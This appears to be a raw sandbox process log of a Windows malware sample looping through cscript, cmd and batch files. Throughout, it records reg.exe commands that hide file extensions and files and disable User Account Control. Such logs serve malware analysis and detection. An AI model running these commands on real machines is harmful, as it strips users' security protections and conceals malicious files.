C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jUUkMgMI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kUkwgoYA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CqYQsgcQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MuEocwgU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOIIYwQU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tewgIUQA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JckosAEU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EQokwMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqAgAEQU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eYQwocwY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pekkkEEc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xgEEYYAE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RIggEQoQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmMQIgEU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YyIwwMQY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EQcIEYAE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\naEUYEgk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XCcwUUcA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nqgIQEYE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QusossEo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
